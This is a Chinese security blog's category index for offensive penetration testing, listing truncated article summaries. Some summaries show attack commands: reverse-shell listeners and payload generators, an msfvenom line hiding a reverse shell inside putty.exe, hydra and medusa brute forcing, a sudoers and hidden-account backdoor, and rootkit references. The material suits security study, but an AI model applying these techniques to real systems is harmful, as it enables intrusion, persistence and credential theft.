随笔分类 - 攻防渗透
1
摘要:Invoke-PowerShellTcp.ps1 监听主机:nc -nv -l -p 9999 powercat.ps1 监听主机:nc -nv -l -p 9999 unicorn.py Eg:python unicorn.py windows/meterpreter/reverse_tcp 19
阅读全文
摘要:本文首发Freebuf,属原创奖励计划,未经许可禁止转载。 链接:http://www.freebuf.com/articles/system/132274.html 一. 前言 前段时间Shadow Broker披露了 Windows大量漏洞,甚至爆出黑客组织 Equation Group 对于W
阅读全文
摘要:渗透测试资源 Metasploit Unleashed 链接地址 - 免费攻防安全metasploita课程PTES 链接地址 - 渗透测试执行标准OWASP 链接地址 - 开源Web应用安全项目Shellcode开发:Shellcode Tutorials 链接地址 - 如何写shellcode的
阅读全文
摘要:转载自: https://www.blackh4t.org/archives/1143.html http://www.91ri.org/5958.html 1、 什么是WebApp Pentesting WebApp Pentesting,由PentesterLab出品。官方给自己的定义是一个简单
阅读全文
摘要:原文:揭秘Windows系统的四个后门 组策略欺骗后门 创建一个批处理文件add.bat,内容是: (2)利用 上传运行gpedit.msc,定位到“计算机配置一>Windows设置一>脚本(启动/关机)”, 双击右边窗口的“关机”,在其中添加add.bat。 这样就实现了当系统关机时创建hack$
阅读全文
摘要:一. MSF提权 假设获得一个非管理员权限的会话,序号为1 getuid 查看当前权限 background 从meterpreter会话中暂时退出 (1)bypassuac模块 适用系统:Win7 32/64位 类似模块 (2) 利用漏洞模块提权 如ms13_053,ms14_058,ms16_0
阅读全文
摘要:练习环境 名称: Damn Vulnerable Web Application(DVWA) 项目地址: http://dvwa.co.uk/ 简介:DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序 另外附一个中文版的:https://www.waitalo
阅读全文
摘要:后门 (1)开机自动反弹shell (2)linux后门 Rookit 目前常用的有:t0rn /mafix/enyelkm 等 mafix rootkit Mafix是一款常用的轻量应用级别Rootkits,是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。URL:
阅读全文
摘要:浏览器攻击 browser_autpwn2 (BAP2) 窃取浏览器登录凭证root@bt:# service apache2 startroot@bt:# setoolkit Office ms10_087漏洞,执行自定义的exe文件 root@kali:~# cd /root/.msf4/loc
阅读全文
摘要:常见捆绑注入payload手法 Payload捆绑注入 msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=xxx -x putty.exe -k -e x86/shikata_ga_
阅读全文
摘要:Google Hacking 参数详解 google hacking 应用举例 Shodan Hacking ZoomEye (钟道之眼) 应用举例 小技巧: 突破封锁检索想要下载的类型文件 语法: index of /。。。 相关内容 shodan服务器安全审计 http://www.freebu
阅读全文
摘要:SMB: enum -D -u administrator -f passwords.txt 服务器名 FTP: medusa -H ip.txt -U user.txt -P passwd.txt -M ftp hydra -l 用户名 -P 密码字典 -e ns -vV IP ftp hydra
阅读全文
摘要:主机扫描 MS08067 :--script=smb-vuln-ms08-067 MS-17-010:--script=smb-vuln-ms17-010 主机服务扫描 路由设备 Web扫描 nikto.pl -h 10.100.100.10 扫描主机10.100.100.10的80口上的WEB
阅读全文
摘要:参考链接 拓展阅读 linux设置启动执行命令:http://www.cnblogs.com/ssooking/p/6094740.html 反弹IP:10.0.0.1 监听端口:1234 Bash [shell有时由bash解析有时由sh解析,不一定百发百中] 注:/dev/[tcp|upd]/h
阅读全文
摘要:赋予用户sudo权限 vi /etc/sudoers 添加如下一行: USER ALL=(ALL) NOPASSWD: ALL (实现当前用户允许转换成任意用户及执行任意命令) 添加root权限账户 (1)命令添加法 创建帐号:# useradd [-u UID] [-g GID] [-d HOME
阅读全文
摘要:项目主页 https://github.com/Medicean/VulApps 项目介绍 收集各种漏洞环境,统一采用 Dockerfile 形式。DockerHub 在线镜像地址 获取并使用相关镜像 直接使用 docker 命令拉取相关镜像,并启动。需要查看相关环境的 tag 如果获取速度慢,推荐
阅读全文
摘要:安全审计 数据分析 capinfos xxx.pcap 产看数据包基本信息 日志分析 who /var/log/wtmp #查看登录用户信息 哈希校验 sha265 文件名 md5sum 文件名 > hash.txt 然后把hash.txt与源文件放在一个文件夹 md5sum -c hash.txt #将hash.txt中的hash值与源文...
阅读全文
摘要:服务探测 google搜索密码相关语法 摘自:http://blog.csdn.net/jeanphorn/article/details/44907737 相关阅读: 工具:maltego,wydomain,subdomain,discover,recon-ng,dmitry discover,r
阅读全文
摘要:原文: https://ssooking.github.io/kali-rolling-an-zhuang-zhi-hou-de-yi-xie-chang-yong-pei-zhi-zong-jie/ 添加普通用户 把某个用户添加到组中: sudo usermod -a 用户名 -G 组名递归更改目
阅读全文
1